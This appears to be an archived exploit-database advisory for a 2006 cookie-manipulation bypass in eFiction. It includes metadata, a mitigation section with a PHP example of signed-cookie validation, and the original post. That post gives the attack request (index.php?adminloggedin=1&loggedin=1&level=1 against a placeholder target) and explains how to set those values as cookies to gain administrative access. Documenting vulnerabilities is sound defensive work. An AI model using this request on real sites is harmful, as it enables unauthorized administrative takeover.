Vendor: eFiction
By: milw0rm.com
CVSS: 7,5 (HIGH)
Type: Cookie Manipulation
CWE: 384
Product Name: eFiction
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

eFiction vulnerability

This vulnerability allows an attacker to gain administrative access to an eFiction website by manipulating cookies. The application accepts the adminloggedin, loggedin and level values from the client, so the attacker can use the Firefox extension 'Add n Edit Cookies' to add them to the browser as cookies, which are then sent with each page request.

Mitigation:

The website should be configured to use secure cookies and the cookies should be validated on the server side.
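
One way to do the server-side validation this mitigation calls for, as an added example that is not eFiction's code and not part of the original advisory: the login cookie carries an HMAC that only the server can compute, so client-chosen values such as loggedin=1 are rejected. The function names, cookie layout and key are assumptions made for the illustration.

```php
<?php
// Hypothetical names throughout; none of this is taken from eFiction.
const SECRET_KEY = 'replace-with-random-32-bytes'; // placeholder, keep server-side

// Build "uid|level|expiry|mac". Only the holder of SECRET_KEY can make the mac.
function issue_auth_cookie(int $uid, int $level, int $ttl = 3600): string
{
    $payload = $uid . '|' . $level . '|' . (time() + $ttl);
    return $payload . '|' . hash_hmac('sha256', $payload, SECRET_KEY);
}

// Return ['uid' => int, 'level' => int] for a cookie this server issued,
// or null for anything missing, malformed, forged or expired.
function verify_auth_cookie(?string $cookie): ?array
{
    if ($cookie === null) {
        return null;
    }
    $parts = explode('|', $cookie);
    if (count($parts) !== 4) {
        return null;
    }
    [$uid, $level, $expiry, $mac] = $parts;
    $expected = hash_hmac('sha256', "$uid|$level|$expiry", SECRET_KEY);
    if (!hash_equals($expected, $mac)) { // constant-time comparison
        return null;
    }
    if (!ctype_digit($uid) || !ctype_digit($level) || !ctype_digit($expiry)) {
        return null;
    }
    if ((int) $expiry < time()) {
        return null;
    }
    return ['uid' => (int) $uid, 'level' => (int) $level];
}

// Constructed inputs: one cookie issued by the server, two set by the client.
$genuine = issue_auth_cookie(42, 1);
$bare    = '1';                                     // a plain flag value
$forged  = '1|1|9999999999|' . str_repeat('0', 64); // right shape, made-up mac

foreach (['genuine' => $genuine, 'bare' => $bare, 'forged' => $forged] as $name => $c) {
    $claims = verify_auth_cookie($c);
    echo $name, ': ', $claims === null ? 'rejected' : 'accepted', PHP_EOL;
}
```

Privilege checks then read only the array returned by verify_auth_cookie(), never $_GET or $_COOKIE values directly. Keeping the login state in PHP's server-side $_SESSION achieves the same goal without putting any privilege data in the cookie.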

Exploit-DB raw data:

##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing 
these websites under MY name, which is a shame because they ripped it from a private discussion 
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone, 
nor act in this type of activity. I suggest whoever is defacing websites under my name stop, 
since you would gain more notoriety under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use Firefox's extension "add n edit cookies" to add these to your cookies so they stick. 
(i.e.: instead of $_GET['loggedin'] it's $_COOKIE['loggedin'] which stays with each page)

# milw0rm.com [2006-08-25]